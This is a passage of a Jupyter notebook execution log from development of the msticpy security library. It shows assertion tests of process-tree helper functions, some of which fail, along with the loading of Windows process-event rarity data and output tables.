len(full_tree) == 871\nchildren = ptutil.get_children(p_tree_l, t_root)\nassert len(children) == 13\n\ndepth = full_tree[\"path\"].str.count(\"/\").max() + 1\nbottom_desc = full_tree[full_tree[\"path\"].str.count(\"/\") == depth - 1].iloc[0]\n\nassert len(ptutil.get_ancestors(p_tree_l, bottom_desc)) == 3\n\nassert isinstance(ptutil.get_parent(p_tree_l, bottom_desc), pd.Series)\nassert (ptutil.get_process(p_tree_l, bottom_desc.name).dropna() == bottom_desc.dropna()).all()\nassert (ptutil.get_process(p_tree_l, bottom_desc).dropna() == bottom_desc.dropna()).all()\nptutil.build_process_key(bottom_desc) == bottom_desc.name\n\nassert (ptutil.get_root(p_tree_l, bottom_desc).dropna() == t_root.dropna()).all()\n\nchildren2 = ptutil.get_children(p_tree_l, t_root, include_source=False)\nassert len(children2) == len(ptutil.get_siblings(p_tree_l, children2.iloc[0], include_source=True))\nassert len(children2) == (len(ptutil.get_siblings(p_tree_l, children2.iloc[0], include_source=False)) + 1)\nassert ptutil.get_summary_info(p_tree_l) == {\n 'Processes': 1010,\n 'RootProcesses': 10,\n 'LeafProcesses': 815,\n 'BranchProcesses': 185,\n 'IsolatedProcesses': 0,\n 'LargestTreeDepth': 7}\n\nassert ptutil.infer_schema(p_tree_l) == ptutil.WIN_EVENT_SCH" }, "executionTime": "2019-12-13T21:39:25.643Z" }, { "cell": { "executionCount": 20, "executionEventId": "a445df77-1549-4f42-9748-6de13cf6446d", "hasError": true, "id": "77f00558-8d9a-44ba-b022-4d48ccbac5f2", "outputs": [ { "ename": "AssertionError", "evalue": "", "output_type": "error", "traceback": [ "\u001b[1;31m---------------------------------------------------------------------------\u001b[0m", "\u001b[1;31mAssertionError\u001b[0m Traceback (most recent call last)", "\u001b[1;32m\u001b[0m in \u001b[0;36m\u001b[1;34m\u001b[0m\n\u001b[0;32m 27\u001b[0m \u001b[1;34m'BranchProcesses'\u001b[0m\u001b[1;33m:\u001b[0m \u001b[1;36m185\u001b[0m\u001b[1;33m,\u001b[0m\u001b[1;33m\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n\u001b[0;32m 28\u001b[0m \u001b[1;34m'IsolatedProcesses'\u001b[0m\u001b[1;33m:\u001b[0m \u001b[1;36m0\u001b[0m\u001b[1;33m,\u001b[0m\u001b[1;33m\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n\u001b[1;32m---> 29\u001b[1;33m 'LargestTreeDepth': 7}\n\u001b[0m\u001b[0;32m 30\u001b[0m \u001b[1;33m\u001b[0m\u001b[0m\n\u001b[0;32m 31\u001b[0m \u001b[1;32massert\u001b[0m \u001b[0mptutil\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0minfer_schema\u001b[0m\u001b[1;33m(\u001b[0m\u001b[0mp_tree_l\u001b[0m\u001b[1;33m)\u001b[0m \u001b[1;33m==\u001b[0m \u001b[0mptutil\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0mWIN_EVENT_SCH\u001b[0m\u001b[1;33m\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n", "\u001b[1;31mAssertionError\u001b[0m: " ] } ], "persistentId": "f3fdc570-35d1-49cd-bfbf-c3a305566e20", "text": "\nassert len(ptutil.get_roots(p_tree_l)) == 29\nt_root = ptutil.get_roots(p_tree_l).iloc[0]\nfull_tree = ptutil.get_descendents(p_tree_l, t_root)\nassert len(full_tree) == 871\nchildren = ptutil.get_children(p_tree_l, t_root)\nassert len(children) == 436\n\ndepth = full_tree[\"path\"].str.count(\"/\").max() + 1\nbottom_desc = full_tree[full_tree[\"path\"].str.count(\"/\") == depth - 1].iloc[0]\n\nassert len(ptutil.get_ancestors(p_tree_l, bottom_desc)) == 3\n\nassert isinstance(ptutil.get_parent(p_tree_l, bottom_desc), pd.Series)\nassert (ptutil.get_process(p_tree_l, bottom_desc.name).dropna() == bottom_desc.dropna()).all()\nassert (ptutil.get_process(p_tree_l, bottom_desc).dropna() == bottom_desc.dropna()).all()\nptutil.build_process_key(bottom_desc) == bottom_desc.name\n\nassert (ptutil.get_root(p_tree_l, bottom_desc).dropna() == t_root.dropna()).all()\n\nchildren2 = ptutil.get_children(p_tree_l, t_root, include_source=False)\nassert len(children2) == len(ptutil.get_siblings(p_tree_l, children2.iloc[0], include_source=True))\nassert len(children2) == (len(ptutil.get_siblings(p_tree_l, children2.iloc[0], include_source=False)) + 1)\nassert ptutil.get_summary_info(p_tree_l) == {\n 'Processes': 1010,\n 'RootProcesses': 10,\n 'LeafProcesses': 815,\n 'BranchProcesses': 185,\n 'IsolatedProcesses': 0,\n 'LargestTreeDepth': 7}\n\nassert ptutil.infer_schema(p_tree_l) == ptutil.WIN_EVENT_SCH" }, "executionTime": "2019-12-13T21:39:52.520Z" }, { "cell": { "executionCount": 21, "executionEventId": "6c69f0b6-c81b-4551-a298-8e4a9f255d30", "hasError": true, "id": "77f00558-8d9a-44ba-b022-4d48ccbac5f2", "outputs": [ { "ename": "AssertionError", "evalue": "", "output_type": "error", "traceback": [ "\u001b[1;31m---------------------------------------------------------------------------\u001b[0m", "\u001b[1;31mAssertionError\u001b[0m Traceback (most recent call last)", "\u001b[1;32m\u001b[0m in \u001b[0;36m\u001b[1;34m\u001b[0m\n\u001b[0;32m 23\u001b[0m \u001b[1;32massert\u001b[0m \u001b[0mptutil\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0mget_summary_info\u001b[0m\u001b[1;33m(\u001b[0m\u001b[0mp_tree_l\u001b[0m\u001b[1;33m)\u001b[0m \u001b[1;33m==\u001b[0m \u001b[1;33m{\u001b[0m\u001b[1;34m'Processes'\u001b[0m\u001b[1;33m:\u001b[0m \u001b[1;36m1029\u001b[0m\u001b[1;33m,\u001b[0m \u001b[1;34m'RootProcesses'\u001b[0m\u001b[1;33m:\u001b[0m \u001b[1;36m29\u001b[0m\u001b[1;33m,\u001b[0m \u001b[1;34m'LeafProcesses'\u001b[0m\u001b[1;33m:\u001b[0m \u001b[1;36m497\u001b[0m\u001b[1;33m,\u001b[0m \u001b[1;34m'BranchProcesses'\u001b[0m\u001b[1;33m:\u001b[0m \u001b[1;36m503\u001b[0m\u001b[1;33m,\u001b[0m \u001b[1;34m'IsolatedProcesses'\u001b[0m\u001b[1;33m:\u001b[0m \u001b[1;36m0\u001b[0m\u001b[1;33m,\u001b[0m \u001b[1;34m'LargestTreeDepth'\u001b[0m\u001b[1;33m:\u001b[0m \u001b[1;36m5\u001b[0m\u001b[1;33m}\u001b[0m\u001b[1;33m\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n\u001b[0;32m 24\u001b[0m \u001b[1;33m\u001b[0m\u001b[0m\n\u001b[1;32m---> 25\u001b[1;33m \u001b[1;32massert\u001b[0m \u001b[0mptutil\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0minfer_schema\u001b[0m\u001b[1;33m(\u001b[0m\u001b[0mp_tree_l\u001b[0m\u001b[1;33m)\u001b[0m \u001b[1;33m==\u001b[0m \u001b[0mptutil\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0mWIN_EVENT_SCH\u001b[0m\u001b[1;33m\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n\u001b[0m", "\u001b[1;31mAssertionError\u001b[0m: " ] } ], "persistentId": "f3fdc570-35d1-49cd-bfbf-c3a305566e20", "text": "\nassert len(ptutil.get_roots(p_tree_l)) == 29\nt_root = ptutil.get_roots(p_tree_l).iloc[0]\nfull_tree = ptutil.get_descendents(p_tree_l, t_root)\nassert len(full_tree) == 871\nchildren = ptutil.get_children(p_tree_l, t_root)\nassert len(children) == 436\n\ndepth = full_tree[\"path\"].str.count(\"/\").max() + 1\nbottom_desc = full_tree[full_tree[\"path\"].str.count(\"/\") == depth - 1].iloc[0]\n\nassert len(ptutil.get_ancestors(p_tree_l, bottom_desc)) == 3\n\nassert isinstance(ptutil.get_parent(p_tree_l, bottom_desc), pd.Series)\nassert (ptutil.get_process(p_tree_l, bottom_desc.name).dropna() == bottom_desc.dropna()).all()\nassert (ptutil.get_process(p_tree_l, bottom_desc).dropna() == bottom_desc.dropna()).all()\nptutil.build_process_key(bottom_desc) == bottom_desc.name\n\nassert (ptutil.get_root(p_tree_l, bottom_desc).dropna() == t_root.dropna()).all()\n\nchildren2 = ptutil.get_children(p_tree_l, t_root, include_source=False)\nassert len(children2) == len(ptutil.get_siblings(p_tree_l, children2.iloc[0], include_source=True))\nassert len(children2) == (len(ptutil.get_siblings(p_tree_l, children2.iloc[0], include_source=False)) + 1)\nassert ptutil.get_summary_info(p_tree_l) == {'Processes': 1029, 'RootProcesses': 29, 'LeafProcesses': 497, 'BranchProcesses': 503, 'IsolatedProcesses': 0, 'LargestTreeDepth': 5}\n\nassert ptutil.infer_schema(p_tree_l) == ptutil.WIN_EVENT_SCH" }, "executionTime": "2019-12-13T21:40:31.946Z" }, { "cell": { "executionCount": 22, "executionEventId": "1225686a-d9e4-4cb9-937a-997a536f77f6", "hasError": false, "id": "77f00558-8d9a-44ba-b022-4d48ccbac5f2", "outputs": [], "persistentId": "f3fdc570-35d1-49cd-bfbf-c3a305566e20", "text": "\nassert len(ptutil.get_roots(p_tree_l)) == 29\nt_root = ptutil.get_roots(p_tree_l).iloc[0]\nfull_tree = ptutil.get_descendents(p_tree_l, t_root)\nassert len(full_tree) == 871\nchildren = ptutil.get_children(p_tree_l, t_root)\nassert len(children) == 436\n\ndepth = full_tree[\"path\"].str.count(\"/\").max() + 1\nbottom_desc = full_tree[full_tree[\"path\"].str.count(\"/\") == depth - 1].iloc[0]\n\nassert len(ptutil.get_ancestors(p_tree_l, bottom_desc)) == 3\n\nassert isinstance(ptutil.get_parent(p_tree_l, bottom_desc), pd.Series)\nassert (ptutil.get_process(p_tree_l, bottom_desc.name).dropna() == bottom_desc.dropna()).all()\nassert (ptutil.get_process(p_tree_l, bottom_desc).dropna() == bottom_desc.dropna()).all()\nptutil.build_process_key(bottom_desc) == bottom_desc.name\n\nassert (ptutil.get_root(p_tree_l, bottom_desc).dropna() == t_root.dropna()).all()\n\nchildren2 = ptutil.get_children(p_tree_l, t_root, include_source=False)\nassert len(children2) == len(ptutil.get_siblings(p_tree_l, children2.iloc[0], include_source=True))\nassert len(children2) == (len(ptutil.get_siblings(p_tree_l, children2.iloc[0], include_source=False)) + 1)\nassert ptutil.get_summary_info(p_tree_l) == {'Processes': 1029, 'RootProcesses': 29, 'LeafProcesses': 497, 'BranchProcesses': 503, 'IsolatedProcesses': 0, 'LargestTreeDepth': 5}\n\nassert ptutil.infer_schema(p_tree_l) == ptutil.LX_EVENT_SCH" }, "executionTime": "2019-12-13T21:40:41.468Z" }, { "cell": { "executionCount": 1, "executionEventId": "8ae1cbce-55d9-422e-a1ab-96220b3bdbb1", "hasError": true, "id": "6be14541-0e7c-4bb9-ae1f-69c923cc1543", "outputs": [ { "ename": "NameError", "evalue": "name 'pd' is not defined", "output_type": "error", "traceback": [ "\u001b[1;31m---------------------------------------------------------------------------\u001b[0m", "\u001b[1;31mNameError\u001b[0m Traceback (most recent call last)", "\u001b[1;32m\u001b[0m in \u001b[0;36m\u001b[1;34m\u001b[0m\n\u001b[1;32m----> 1\u001b[1;33m \u001b[0mproc_rarity\u001b[0m \u001b[1;33m=\u001b[0m \u001b[0mpd\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0mread_pickle\u001b[0m\u001b[1;33m(\u001b[0m\u001b[1;34m\"../demos/data/process_rarity.pkl\"\u001b[0m\u001b[1;33m)\u001b[0m\u001b[1;33m\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n\u001b[0m", "\u001b[1;31mNameError\u001b[0m: name 'pd' is not defined" ] } ], "persistentId": "35246f6b-b15f-4eb4-941e-f53824a56ead", "text": "proc_rarity = pd.read_pickle(\"../demos/data/process_rarity.pkl\")" }, "executionTime": "2019-12-13T22:38:23.697Z" }, { "cell": { "executionCount": 2, "executionEventId": "6b8e33f3-ae06-4d75-bdf7-6942185c794c", "hasError": false, "id": "6be14541-0e7c-4bb9-ae1f-69c923cc1543", "outputs": [], "persistentId": "35246f6b-b15f-4eb4-941e-f53824a56ead", "text": "import pandas as pd\nproc_rarity = pd.read_pickle(\"../demos/data/process_rarity.pkl\")" }, "executionTime": "2019-12-13T22:38:51.996Z" }, { "cell": { "executionCount": 3, "executionEventId": "c09016ff-5f87-4500-8d25-353993f3c407", "hasError": false, "id": "6be14541-0e7c-4bb9-ae1f-69c923cc1543", "outputs": [ { "data": { "text/html": "\nThis product includes GeoLite2 data created by MaxMind, available from\nhttps://www.maxmind.com.\n", "text/plain": "" }, "metadata": {}, "output_type": "display_data" }, { "data": { "text/html": "\nThis library uses services provided by ipstack.\nhttps://ipstack.com", "text/plain": "" }, "metadata": {}, "output_type": "display_data" }, { "name": "stdout", "output_type": "stream", "text": "Using Open PageRank. See https://www.domcop.com/openpagerank/what-is-openpagerank\n" } ], "persistentId": "35246f6b-b15f-4eb4-941e-f53824a56ead", "text": "import pandas as pd\nproc_rarity = pd.read_pickle(\"../demos/data/process_rarity.pkl\")\n\nproc_tree = pd.read_pickle(\"../bhdemo/process_tree\")\n\nfrom msticpy.sectools import *\nimport msticpy.nbtools.process_tree as ptplot" }, "executionTime": "2019-12-13T22:42:45.614Z" }, { "cell": { "executionCount": 4, "executionEventId": "b0f79a28-4282-44af-82b8-3d064fd786a7", "hasError": true, "id": "ca79e527-dd67-49ee-a623-46e05389e884", "outputs": [ { "ename": "NameError", "evalue": "name 'ptutil' is not defined", "output_type": "error", "traceback": [ "\u001b[1;31m---------------------------------------------------------------------------\u001b[0m", "\u001b[1;31mNameError\u001b[0m Traceback (most recent call last)", "\u001b[1;32m\u001b[0m in \u001b[0;36m\u001b[1;34m\u001b[0m\n\u001b[1;32m----> 1\u001b[1;33m \u001b[0mptutil\u001b[0m\u001b[1;33m\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n\u001b[0m", "\u001b[1;31mNameError\u001b[0m: name 'ptutil' is not defined" ] } ], "persistentId": "1918edbe-6e6a-4d00-9c31-de7fed6f588b", "text": "ptutil" }, "executionTime": "2019-12-13T22:43:05.613Z" }, { "cell": { "executionCount": 5, "executionEventId": "0d05f0df-57c6-4c57-8082-08b3347cc17b", "hasError": false, "id": "ca79e527-dd67-49ee-a623-46e05389e884", "outputs": [ { "data": { "text/plain": "" }, "execution_count": 5, "metadata": {}, "output_type": "execute_result" } ], "persistentId": "1918edbe-6e6a-4d00-9c31-de7fed6f588b", "text": "dir" }, "executionTime": "2019-12-13T22:43:10.309Z" }, { "cell": { "executionCount": 6, "executionEventId": "aac94171-6622-4a1a-a198-1a1f8044ef56", "hasError": false, "id": "ca79e527-dd67-49ee-a623-46e05389e884", "outputs": [ { "data": { "text/plain": "['GeoLiteLookup',\n 'IPStackLookup',\n 'In',\n 'IoCExtract',\n 'Out',\n 'TILookup',\n 'VERSION',\n 'VTLookup',\n '_',\n '_5',\n '__',\n '___',\n '__builtin__',\n '__builtins__',\n '__doc__',\n '__loader__',\n '__name__',\n '__package__',\n '__spec__',\n '_dh',\n '_i',\n '_i1',\n '_i2',\n '_i3',\n '_i4',\n '_i5',\n '_i6',\n '_ih',\n '_ii',\n '_iii',\n '_oh',\n 'base64',\n 'base64unpack',\n 'domain_utils',\n 'exit',\n 'geo_distance',\n 'geoip',\n 'get_ipython',\n 'iocextract',\n 'pd',\n 'proc_rarity',\n 'proc_tree',\n 'process_tree_utils',\n 'ptplot',\n 'ptree',\n 'quit',\n 'tilookup',\n 'tiproviders',\n 'vtlookup']" }, "execution_count": 6, "metadata": {}, "output_type": "execute_result" } ], "persistentId": "1918edbe-6e6a-4d00-9c31-de7fed6f588b", "text": "dir()" }, "executionTime": "2019-12-13T22:43:12.939Z" }, { "cell": { "executionCount": 7, "executionEventId": "4810f606-3705-4e0e-91f1-2accf522c793", "hasError": true, "id": "cb9f54c7-e7fb-4ec4-a3a9-985bc77d2efa", "outputs": [ { "ename": "NameError", "evalue": "name 'process_rarity' is not defined", "output_type": "error", "traceback": [ "\u001b[1;31m---------------------------------------------------------------------------\u001b[0m", "\u001b[1;31mNameError\u001b[0m Traceback (most recent call last)", "\u001b[1;32m\u001b[0m in \u001b[0;36m\u001b[1;34m\u001b[0m\n\u001b[1;32m----> 1\u001b[1;33m \u001b[0mprocess_rarity\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0mhead\u001b[0m\u001b[1;33m(\u001b[0m\u001b[1;33m)\u001b[0m\u001b[1;33m\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n\u001b[0m", "\u001b[1;31mNameError\u001b[0m: name 'process_rarity' is not defined" ] } ], "persistentId": "e27a3066-b20e-483c-b9c2-52c154f1a03c", "text": "process_rarity.head()" }, "executionTime": "2019-12-13T22:44:50.171Z" }, { "cell": { "executionCount": 8, "executionEventId": "59388e10-0a72-4a89-b227-74cfc2b5faa3", "hasError": false, "id": "cb9f54c7-e7fb-4ec4-a3a9-985bc77d2efa", "outputs": [ { "data": { "text/html": "
\n\n\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n
SubjectUserNameSubjectLogonIdRarityProcessCount
0-0x3e70.35000020
1LOCAL SERVICE0x3e50.03846226
2MSTICAdmin0x109c4080.43254910
3MSTICAdmin0x1e821b50.2399928
4MSTICAdmin0x1f388a30.2028487
\n
", "text/plain": " SubjectUserName SubjectLogonId Rarity ProcessCount\n0 - 0x3e7 0.350000 20\n1 LOCAL SERVICE 0x3e5 0.038462 26\n2 MSTICAdmin 0x109c408 0.432549 10\n3 MSTICAdmin 0x1e821b5 0.239992 8\n4 MSTICAdmin 0x1f388a3 0.202848 7" }, "execution_count": 8, "metadata": {}, "output_type": "execute_result" } ], "persistentId": "e27a3066-b20e-483c-b9c2-52c154f1a03c", "text": "proc_rarity.head()" }, "executionTime": "2019-12-13T22:45:04.278Z" }, { "cell": { "executionCount": 9, "executionEventId": "beb581ff-ad68-4a29-839c-75c4b2e23d07", "hasError": false, "id": "6be14541-0e7c-4bb9-ae1f-69c923cc1543", "outputs": [], "persistentId": "35246f6b-b15f-4eb4-941e-f53824a56ead", "text": "import pandas as pd\nproc_rarity = pd.read_pickle(\"../demos/data/procs_with_cluster.pkl\")\n\nproc_tree = pd.read_pickle(\"../bhdemo/process_tree\")\n\nfrom msticpy.sectools import *\nimport msticpy.nbtools.process_tree as ptplot" }, "executionTime": "2019-12-13T22:45:52.409Z" }, { "cell": { "executionCount": 10, "executionEventId": "0a375198-c37a-4e9b-a288-b6bfd8fec5d3", "hasError": false, "id": "cb9f54c7-e7fb-4ec4-a3a9-985bc77d2efa", "outputs": [ { "data": { "text/html": "
\n\n\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n
TenantIdAccountEventIDTimeGeneratedComputerSubjectUserSidSubjectUserNameSubjectDomainNameSubjectLogonIdNewProcessId...pathHashcommandlineLencommandlineLogLencommandlineTokensFullcommandlineScorecommandlineTokensHashisSystemSessionaccountNumClusterSizeRarity
052b1ab41-869e-4138-9e40-2a4457f09bf0WORKGROUP\\MSTICAlertsWin1$46882019-02-10 15:21:06.890MSTICAlertsWin1S-1-5-18MSTICAlertsWin1$WORKGROUP0x3e70xd78...41637827181192.07554718101422764818190True22021290.007752
152b1ab41-869e-4138-9e40-2a4457f09bf0WORKGROUP\\MSTICAlertsWin1$46882019-02-10 13:12:52.733MSTICAlertsWin1S-1-5-18MSTICAlertsWin1$WORKGROUP0x3e70x6f8...41637827181192.07554718101422764818190True22021290.007752
252b1ab41-869e-4138-9e40-2a4457f09bf0WORKGROUP\\MSTICAlertsWin1$46882019-02-10 12:08:46.173MSTICAlertsWin1S-1-5-18MSTICAlertsWin1$WORKGROUP0x3e70xd68...41637827181192.07554718101422764818190True22021290.007752
352b1ab41-869e-4138-9e40-2a4457f09bf0WORKGROUP\\MSTICAlertsWin1$46882019-02-10 14:16:59.427MSTICAlertsWin1S-1-5-18MSTICAlertsWin1$WORKGROUP0x3e70x16d4...41637827181192.07554718101422764818190True22021290.007752
452b1ab41-869e-4138-9e40-2a4457f09bf0WORKGROUP\\MSTICAlertsWin1$46882019-02-10 08:56:16.593MSTICAlertsWin1S-1-5-18MSTICAlertsWin1$WORKGROUP0x3e70x1070...41637827181192.07554718101422764818190True22021290.007752
\n

5 rows × 31 columns

\n
", "text/plain": " TenantId Account EventID \\\n0 52b1ab41-869e-4138-9e40-2a4457f09bf0 WORKGROUP\\MSTICAlertsWin1$ 4688 \n1 52b1ab41-869e-4138-9e40-2a4457f09bf0 WORKGROUP\\MSTICAlertsWin1$ 4688 \n2 52b1ab41-869e-4138-9e40-2a4457f09bf0 WORKGROUP\\MSTICAlertsWin1$ 4688 \n3 52b1ab41-869e-4138-9e40-2a4457f09bf0 WORKGROUP\\MSTICAlertsWin1$ 4688 \n4 52b1ab41-869e-4138-9e40-2a4457f09bf0 WORKGROUP\\MSTICAlertsWin1$ 4688 \n\n TimeGenerated Computer SubjectUserSid SubjectUserName \\\n0 2019-02-10 15:21:06.890 MSTICAlertsWin1 S-1-5-18 MSTICAlertsWin1$ \n1 2019-02-10 13:12:52.733 MSTICAlertsWin1 S-1-5-18 MSTICAlertsWin1$ \n2 2019-02-10 12:08:46.173 MSTICAlertsWin1 S-1-5-18 MSTICAlertsWin1$ \n3 2019-02-10 14:16:59.427 MSTICAlertsWin1 S-1-5-18 MSTICAlertsWin1$ \n4 2019-02-10 08:56:16.593 MSTICAlertsWin1 S-1-5-18 MSTICAlertsWin1$ \n\n SubjectDomainName SubjectLogonId NewProcessId ... pathHash \\\n0 WORKGROUP 0x3e7 0xd78 ... 4163782718 \n1 WORKGROUP 0x3e7 0x6f8 ... 4163782718 \n2 WORKGROUP 0x3e7 0xd68 ... 4163782718 \n3 WORKGROUP 0x3e7 0x16d4 ... 4163782718 \n4 WORKGROUP 0x3e7 0x1070 ... 4163782718 \n\n commandlineLen commandlineLogLen commandlineTokensFull commandlineScore \\\n0 119 2.075547 18 10142 \n1 119 2.075547 18 10142 \n2 119 2.075547 18 10142 \n3 119 2.075547 18 10142 \n4 119 2.075547 18 10142 \n\n commandlineTokensHash isSystemSession accountNum ClusterSize Rarity \n0 2764818190 True 2202 129 0.007752 \n1 2764818190 True 2202 129 0.007752 \n2 2764818190 True 2202 129 0.007752 \n3 2764818190 True 2202 129 0.007752 \n4 2764818190 True 2202 129 0.007752 \n\n[5 rows x 31 columns]" }, "execution_count": 10, "metadata": {}, "output_type": "execute_result" } ], "persistentId": "e27a3066-b20e-483c-b9c2-52c154f1a03c", "text": "proc_rarity.head()" }, "executionTime": "2019-12-13T22:45:57.379Z" }, { "cell": { "executionCount": 11, "executionEventId": "9cb35307-bca6-4a77-bf23-5487545bb18d", "hasError": true, "id": "ca79e527-dd67-49ee-a623-46e05389e884", "outputs": [ { "ename": "AttributeError", "evalue": "'DataFrame' object has no attribute 'build_process_tree'", "output_type": "error", "traceback": [ "\u001b[1;31m---------------------------------------------------------------------------\u001b[0m", "\u001b[1;31mAttributeError\u001b[0m Traceback (most recent call last)", "\u001b[1;32m\u001b[0m in \u001b[0;36m\u001b[1;34m\u001b[0m\n\u001b[1;32m----> 1\u001b[1;33m \u001b[0mp_tree_leg\u001b[0m \u001b[1;33m=\u001b[0m \u001b[0mproc_tree\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0mbuild_process_tree\u001b[0m\u001b[1;33m(\u001b[0m\u001b[0mproc_tree\u001b[0m\u001b[1;33m,\u001b[0m \u001b[0mshow_progress\u001b[0m\u001b[1;33m=\u001b[0m\u001b[1;32mTrue\u001b[0m\u001b[1;33m)\u001b[0m\u001b[1;33m\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n\u001b[0m", "\u001b[1;32m~\\AppData\\Local\\Continuum\\anaconda3\\envs\\condadev\\lib\\site-packages\\pandas\\core\\generic.py\u001b[0m in \u001b[0;36m__getattr__\u001b[1;34m(self, name)\u001b[0m\n\u001b[0;32m 5177\u001b[0m \u001b[1;32mif\u001b[0m \u001b[0mself\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0m_info_axis\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0m_can_hold_identifiers_and_holds_name\u001b[0m\u001b[1;33m(\u001b[0m\u001b[0mname\u001b[0m\u001b[1;33m)\u001b[0m\u001b[1;33m:\u001b[0m\u001b[1;33m\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n\u001b[0;32m 5178\u001b[0m \u001b[1;32mreturn\u001b[0m \u001b[0mself\u001b[0m\u001b[1;33m[\u001b[0m\u001b[0mname\u001b[0m\u001b[1;33m]\u001b[0m\u001b[1;33m\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n\u001b[1;32m-> 5179\u001b[1;33m \u001b[1;32mreturn\u001b[0m \u001b[0mobject\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0m__getattribute__\u001b[0m\u001b[1;33m(\u001b[0m\u001b[0mself\u001b[0m\u001b[1;33m,\u001b[0m \u001b[0mname\u001b[0m\u001b[1;33m)\u001b[0m\u001b[1;33m\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n\u001b[0m\u001b[0;32m 5180\u001b[0m \u001b[1;33m\u001b[0m\u001b[0m\n\u001b[0;32m 5181\u001b[0m \u001b[1;32mdef\u001b[0m \u001b[0m__setattr__\u001b[0m\u001b[1;33m(\u001b[0m\u001b[0mself\u001b[0m\u001b[1;33m,\u001b[0m \u001b[0mname\u001b[0m\u001b[1;33m,\u001b[0m \u001b[0mvalue\u001b[0m\u001b[1;33m)\u001b[0m\u001b[1;33m:\u001b[0m\u001b[1;33m\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n", "\u001b[1;31mAttributeError\u001b[0m: 'DataFrame' object has no attribute 'build_process_tree'" ] } ], "persistentId": "1918edbe-6e6a-4d00-9c31-de7fed6f588b", "text": "p_tree_leg = proc_tree.build_process_tree(proc_tree, show_progress=True)" }, "executionTime": "2019-12-13T22:46:32.484Z" }, { "cell": { "executionCount": 12, "executionEventId": "2bb8c149-9ab9-4a74-8e3f-d9418c3c794f", "hasError": false, "id": "ca79e527-dd67-49ee-a623-46e05389e884", "outputs": [ { "data": { "application/vnd.jupyter.widget-view+json": { "model_id": "e5b6f666227b43cc8d6eeb4c60a5bf4d", "version_major": 2, "version_minor": 0 }, "text/plain": "HBox(children=(IntProgress(value=0, bar_style='info', description='Progress:'), Label(value='0%')))" }, "metadata": {}, "output_type": "display_data" }, { "name": "stdout", "output_type": "stream", "text": "{'Processes': 18, 'RootProcesses': 1, 'LeafProcesses': 16, 'BranchProcesses': 1, 'IsolatedProcesses': 0, 'LargestTreeDepth': 3}\n" } ], "persistentId": "1918edbe-6e6a-4d00-9c31-de7fed6f588b", "text": "p_tree_leg = ptree.build_process_tree(proc_tree, show_progress=True)" }, "executionTime": "2019-12-13T22:46:56.345Z" }, { "cell": { "executionCount": 13, "executionEventId": "6e7e0871-6aa1-49ba-a285-4b2ed086d991", "hasError": false, "id": "1df6266c-6aca-4682-8041-584b890d8e70", "outputs": [ { "data": { "text/html": "\n
\n \n Loading BokehJS ...\n
" }, "metadata": {}, "output_type": "display_data" }, { "data": { "application/javascript": "\n(function(root) {\n function now() {\n return new Date();\n }\n\n var force = true;\n\n if (typeof root._bokeh_onload_callbacks === \"undefined\" || force === true) {\n root._bokeh_onload_callbacks = [];\n root._bokeh_is_loading = undefined;\n }\n\n var JS_MIME_TYPE = 'application/javascript';\n var HTML_MIME_TYPE = 'text/html';\n var EXEC_MIME_TYPE = 'application/vnd.bokehjs_exec.v0+json';\n var CLASS_NAME = 'output_bokeh rendered_html';\n\n /**\n * Render data to the DOM node\n */\n function render(props, node) {\n var script = document.createElement(\"script\");\n node.appendChild(script);\n }\n\n /**\n * Handle when an output is cleared or removed\n */\n function handleClearOutput(event, handle) {\n var cell = handle.cell;\n\n var id = cell.output_area._bokeh_element_id;\n var server_id = cell.output_area._bokeh_server_id;\n // Clean up Bokeh references\n if (id != null && id in Bokeh.index) {\n Bokeh.index[id].model.document.clear();\n delete Bokeh.index[id];\n }\n\n if (server_id !== undefined) {\n // Clean up Bokeh references\n var cmd = \"from bokeh.io.state import curstate; print(curstate().uuid_to_server['\" + server_id + \"'].get_sessions()[0].document.roots[0]._id)\";\n cell.notebook.kernel.execute(cmd, {\n iopub: {\n output: function(msg) {\n var id = msg.content.text.trim();\n if (id in Bokeh.index) {\n Bokeh.index[id].model.document.clear();\n delete Bokeh.index[id];\n }\n }\n }\n });\n // Destroy server and session\n var cmd = \"import bokeh.io.notebook as ion; ion.destroy_server('\" + server_id + \"')\";\n cell.notebook.kernel.execute(cmd);\n }\n }\n\n /**\n * Handle when a new output is added\n */\n function handleAddOutput(event, handle) {\n var output_area = handle.output_area;\n var output = handle.output;\n\n // limit handleAddOutput to display_data with EXEC_MIME_TYPE content only\n if ((output.output_type != \"display_data\") || (!output.data.hasOwnProperty(EXEC_MIME_TYPE))) {\n return\n }\n\n var toinsert = output_area.element.find(\".\" + CLASS_NAME.split(' ')[0]);\n\n if 